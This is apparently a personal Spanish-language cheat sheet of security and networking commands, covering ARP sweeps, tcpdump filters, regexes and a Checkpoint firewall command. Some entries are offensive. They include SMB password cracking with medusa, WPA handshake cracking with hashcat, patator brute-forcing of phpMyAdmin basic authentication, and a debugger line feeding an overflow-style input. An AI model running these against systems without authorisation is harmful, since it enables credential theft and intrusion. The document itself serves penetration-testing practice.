Comandos utiles

barrer una red en busca de host con ARP
for i in $( seq 10 ); do arping -c 3 192.168.1.$i ; done

Crack SMB password

medusa -M smbnt -h 192.168.213.137 -u CarlosVM -P ../wordlists/ESP/es.dic -f -m GROUP:LOCAL -m PASS:HAS

IDA

StartDebugger("/home/carlos/.../bin/seaman", "-d /dev/null AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x50\x07\x40\x00", "")


Tcpdump

 tcpdump -eeennni enex.18 vlan and vlan 18 and host 192.168.15.121

nbtscan -r 192.168.192.0/24

Tcpdump regex para encontrar ips con puertos especificos

File Example


10:56:30.671226 IP 150.100.246.205.39239 > 150.100.246.161.1521: P 1:26(25) ack 66 win 50137
10:56:30.672038 IP 150.100.246.161.1521 > 150.100.246.205.39239: . 66:1514(1448) ack 26 win 49232
10:56:30.672038 IP 150.100.246.161.1521 > 150.100.246.205.39239: P 1514:2077(563) ack 26 win 49232
10:56:30.672040 IP 150.100.246.161.1521 > 150.100.246.205.39239: P 2077:3359(1282) ack 26 win 49232
10:56:30.672386 IP 150.100.246.205.39239 > 150.100.246.161.1521: . ack 3359 win 50137
10:56:30.672453 IP 150.100.246.161.1521 > 150.100.151.15.54173: P 2027976638:2027976646(8) ack 2412714148 win 49640
10:56:30.672565 IP 150.100.151.15.54173 > 150.100.246.161.1521: . ack 8 win 49640
10:56:30.672664 IP 150.100.151.15.54173 > 150.100.246.161.1521: P 1:173(172) ack 8 win 49640

grep -Eo '(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]).((1521|1523|1525|1526))'

Localizar una conexion del fwaccel de checkpoint

fwaccel -vs 1 conns

Con esta expresion regular encontramos el puerto que queremos verificar.

((?:\d{1,3}\.){3}).\d\s*443

hashcat


D:\CARLOS DIAZ\SOFTWARE\HACKING\password cracking\oclHashcat-plus-0.1
3>cudaHashcat-plus64.exe -m 2500 -a 3 -o ..\Operaciones\infinitum --outfile-form
at=3 -1 012345678abcdef --gpu-accel=16 --gpu-loops=2048 --session=infi --gpu-tem
p-abort=85  -i --increment-min=8 --increment-max=10 ..\Operaciones\8955_13638025
83.hccap ?1?1?1?1?1?1?1?1


Expresión regular para limpiar del siguiente archivo solo los nombres de los equipos:

https://sites.google.com/site/mycadgo/scripts/equipos_raw.txt

cat equipos_raw.txt | sed -r 's/((\(([0-9]+\.)\)*)|([0-9]+\.)|([0-9A-Za-z ]+\/[0-9]*)|[0-9]+\,[0-9+])//g'| sed -r 's/[ \t]*//'| less

Patator

Romper la autenticación basica de phpmyadmin

 ./patator.py http_fuzz url=http://192.168.48.129/phpmyadmin/ user_pass=root:FILE0 0=passwords.txt accept_cookie=1 auth_type=basic -x quit:code=200 persistent=1 -l tmp